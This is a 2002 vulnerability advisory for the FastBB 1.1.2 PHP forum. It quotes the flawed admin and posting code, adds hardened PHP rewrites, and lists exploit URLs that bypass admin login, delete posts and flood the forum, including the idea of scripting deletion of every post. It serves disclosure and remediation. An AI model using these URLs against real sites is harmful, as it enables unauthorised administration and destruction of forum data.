Overview
Multiple vulnerabilities in FastBB version 1.1.2
Discovered on December 5, 2002; updated on January 1, 2003
Vendor: FastBB
FastBB 1.1.2 is a PHP forum. It has three distinct vulnerabilities:
- Administrator access can be obtained without a password.
- Posts can be deleted without the administrator password.
- The forum can be flooded.
Risk
Exploit easiness:
Vulnerability spreading:
Impact:
Risk:
Details
Admin access without password
The admin web page is admin_.php. Here is a sample of the admin authentication code in admin_.php:
<? require("config.php");
$db=mysql_connect("localhost",$login_compte,$pass_compte);
mysql_select_db($nom_bdd,$db);
// administrator login form
if ($p=="identification")
{
echo "<center><form action='admin_.php?p=auth' method=post>\n";
echo "<table><tr><td>Login</td><td><input type=text name=login></td></tr>\n";
echo "<tr><td>Password</td><td><input type=text name=pass></td></tr></table>\n";
echo "<input type=submit value=entrée></form>\n";
}
// redirect according to the login result
if ($p=="auth")
{
if (($login!="toto")or($pass!="toto"))
{
echo "<center><h4>Authentification incorrecte, recommencez !!</h4><a href='javascript:history.back()'>Retour</a></center>";
}
else
{
echo "<center><h4>Authentification réussie</h4><a href=admin_.php?p=auth_ok>Entrée de l'interface pour suppression des messages</a>";
}
}
// administration interface
if ($p=="auth_ok")
{
echo "<center><h4>Bienvenue sur votre<br>interface d'administration</h4>Choisissez le message à supprimer !!</center><br><br>";
echo "Liste des messages et en-têtes<br><br>";
...etc...
If you look carefully, you can see that $p alone drives the authentication scheme: $p comes straight from the request (the script relies on register_globals), and the credentials are only checked in the "auth" branch. This is the security bug: if $p is passed to admin_.php with the value "auth_ok", the script goes straight to the administration page without ever checking the login and password.
Post deletion
The code that deletes a post is also in admin_.php. Here is the relevant piece of code:
// message deletion
if($p=="eff")
{
mysql_query("DELETE FROM forum WHERE id = '$num_mess'");
echo "<center><h4>le message $num_mess a été effacé avec succés</h4><a href=admin_.php?p=auth_ok>Revenir à la liste des messages</a></center>\n";
}
Once again, the $p variable selects the action, and the $num_mess variable selects the post to delete. Nothing in this branch checks that the caller has authenticated.
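As an added example (not FastBB's code), here is how the admin flow from the two snippets above looks when every privileged branch is gated by a server-side session flag that is set only after the credentials have been verified, instead of by the request parameter $p. It assumes a PDO connection $pdo created in config.php, a `forum` table with integer `id` and text `titre` columns (names inferred from the INSERT later in this advisory), and an administrator login of "admin"; the password hash is a placeholder to be generated with password_hash().

```php
<?php
// Added example: hardened version of the admin_.php flow described above.
// Not FastBB's code. Assumes config.php creates a PDO connection in $pdo,
// and a 'forum' table with columns 'id' (int) and 'titre' (text).
require "config.php";
session_start();

// The action is read explicitly from the request; nothing is taken
// from register_globals.
$p = $_GET['p'] ?? $_POST['p'] ?? '';

// Placeholder values: store the output of password_hash(), never a literal.
const ADMIN_LOGIN = 'admin';
const ADMIN_PASSWORD_HASH = '$2y$10$PLACEHOLDER_HASH_FROM_password_hash';

function isAdmin(): bool
{
    return !empty($_SESSION['is_admin']);
}

// Every privileged branch calls this first, so a request that jumps
// straight to p=auth_ok or p=eff is refused.
function requireAdmin(): void
{
    if (!isAdmin()) {
        http_response_code(403);
        echo "<h4>Authentication required</h4>";
        exit;
    }
}

switch ($p) {
    case 'identification':
        echo "<form action='admin_.php?p=auth' method='post'>";
        echo "Login <input type='text' name='login'> ";
        echo "Password <input type='password' name='pass'> ";
        echo "<input type='submit' value='enter'></form>";
        break;

    case 'auth':
        $login = $_POST['login'] ?? '';
        $pass  = $_POST['pass'] ?? '';
        if ($login === ADMIN_LOGIN && password_verify($pass, ADMIN_PASSWORD_HASH)) {
            session_regenerate_id(true);   // fresh session id after login
            $_SESSION['is_admin'] = true;  // the only place this flag is set
            echo "<a href='admin_.php?p=auth_ok'>Go to the message list</a>";
        } else {
            echo "<h4>Authentication failed</h4>";
        }
        break;

    case 'auth_ok':
        requireAdmin();
        echo "<h4>Administration interface</h4>";
        foreach ($pdo->query("SELECT id, titre FROM forum") as $row) {
            echo htmlspecialchars($row['titre'])
               . " <a href='admin_.php?p=eff&num_mess=" . (int)$row['id'] . "'>delete</a><br>";
        }
        break;

    case 'eff':
        requireAdmin();
        $num = filter_input(INPUT_GET, 'num_mess', FILTER_VALIDATE_INT);
        if ($num === false || $num === null) {
            http_response_code(400);
            exit;
        }
        $stmt = $pdo->prepare("DELETE FROM forum WHERE id = ?");
        $stmt->execute([$num]);
        echo "<h4>Message $num deleted</h4>";
        break;

    default:
        echo "<a href='admin_.php?p=identification'>Login</a>";
}
```

The design point is that $p only chooses which branch runs; whether the branch is allowed to run is decided by $_SESSION['is_admin'], which the client cannot set. Deleting the "auth" branch, or renaming the parameter, would not help: what matters is that the privileged branches no longer trust the request to prove who the caller is.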
Flooding the forum
To post a message, forum_ok.php is used. Here is the relevant piece of code:
if(($nom=="")or($titre==""))
{
echo "<br><br><br><table width=500 align=center cellpadding=3 cellspacing=1 bgcolor=#cccccc><tr><td bgcolor=lightcyan align=center>Merci de remplir les champs <b>nom</b> et <b>sujet</b></center></td></tr></table>";
}
else
{
mysql_query("insert into forum VALUES('','$date','$nom','$titre','$message','$reply_to','')");
echo "<br><br><br><table width=500 align=center cellpadding=3 cellspacing=1 bgcolor=#cccccc><tr><td bgcolor=lightcyan align=center><b>message posté !!</b></center></td></tr></table>";
echo "<script language=javascript>
{
window.location=\"forum.php\";
}
</script>
";
}
As you can see, the only filter checks $nom and $titre. $nom is the nickname and $titre is the title of the post. If either variable is empty, the post is ignored. But if you set $nom and $titre, you can post an empty message, and nothing limits how many posts one client can submit.
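An added example, not FastBB's code, of a forum_ok.php handler that refuses empty messages and throttles repeated posts from one source. It assumes a PDO connection $pdo from config.php and that the `forum` table's columns are, in order, id, date, nom, titre, message and reply_to (inferred from the INSERT above; the seventh, unnamed column is omitted). The limit of 5 posts per 60 seconds per client address, and the file-based counter under /tmp, are choices made for this example.

```php
<?php
// Added example, not FastBB's code: a forum_ok.php that rejects blank
// fields and rate-limits posting. Assumes config.php creates $pdo (PDO)
// and a 'forum' table with columns id, date, nom, titre, message, reply_to
// (names inferred from the INSERT shown in the advisory).
require "config.php";

const MAX_POSTS_PER_WINDOW = 5;     // assumption: 5 posts ...
const WINDOW_SECONDS       = 60;    // ... per minute per client address
const RATE_DIR             = '/tmp/forum_rate';

// Records this attempt and returns true if the client is still under the limit.
function allowPost(string $clientIp): bool
{
    if (!is_dir(RATE_DIR)) {
        mkdir(RATE_DIR, 0700, true);
    }
    $file = RATE_DIR . '/' . hash('sha256', $clientIp);
    $now = time();
    $stamps = file_exists($file)
        ? array_map('intval', file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES))
        : [];
    // Keep only the timestamps that fall inside the current window.
    $stamps = array_values(array_filter($stamps, fn($t) => $now - $t < WINDOW_SECONDS));
    if (count($stamps) >= MAX_POSTS_PER_WINDOW) {
        return false;
    }
    $stamps[] = $now;
    file_put_contents($file, implode("\n", $stamps) . "\n", LOCK_EX);
    return true;
}

// Returns the trimmed field, or null if it is missing, blank or too long.
function requireField(array $src, string $name, int $maxLen): ?string
{
    $value = trim((string)($src[$name] ?? ''));
    if ($value === '' || strlen($value) > $maxLen) {
        return null;
    }
    return $value;
}

// Only accept POST, so a bare GET URL like the one in the advisory does nothing.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit;
}

$nom     = requireField($_POST, 'nom', 40);
$titre   = requireField($_POST, 'titre', 120);
$message = requireField($_POST, 'message', 10000);   // the body is now mandatory too
$replyTo = filter_input(INPUT_POST, 'reply_to', FILTER_VALIDATE_INT) ?: 0;

if ($nom === null || $titre === null || $message === null) {
    echo "Please fill in the <b>name</b>, <b>subject</b> and <b>message</b> fields";
    exit;
}

if (!allowPost($_SERVER['REMOTE_ADDR'] ?? '0.0.0.0')) {
    http_response_code(429);
    echo "Too many posts, please wait a minute";
    exit;
}

$stmt = $pdo->prepare(
    "INSERT INTO forum (date, nom, titre, message, reply_to) VALUES (?, ?, ?, ?, ?)"
);
$stmt->execute([date('Y-m-d H:i:s'), $nom, $titre, $message, $replyTo]);
echo "<b>message posted</b>";
```

The per-address counter is intentionally simple and will not survive clients behind a shared proxy or a distributed source; a real deployment would key the limit on a session or account and keep the counters in the database or a cache rather than in /tmp.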
Exploit
Admin access without password
The exploit is trivial. It can be done with any browser by using this URL:
http://<www.victim.com>/fastbb/admin_.php?p=auth_ok
You will get this page :
Post deletion
This can be done by hand with any browser by using this URL:
http://<www.victim.com>/fastbb/admin_.php?p=eff&num_mess=number_of_the_post
A script can delete all posts by iterating num_mess from 1 to 9999999.
Flooding the forum
This can be done by hand with any browser by using this URL:
http://<www.victim.com>/fastbb/forum_ok.php?nom=your_name&titre=title_of_the_post
A script can flood the forum with a large number of posts in very little time.
Solution
The vendor has been informed and told me to delete the admin_.php file to solve the problems.
The vendor has no solution for the flooding.
Discovered by
Arnaud Jacques aka scrap
webmaster@securiteinfo.com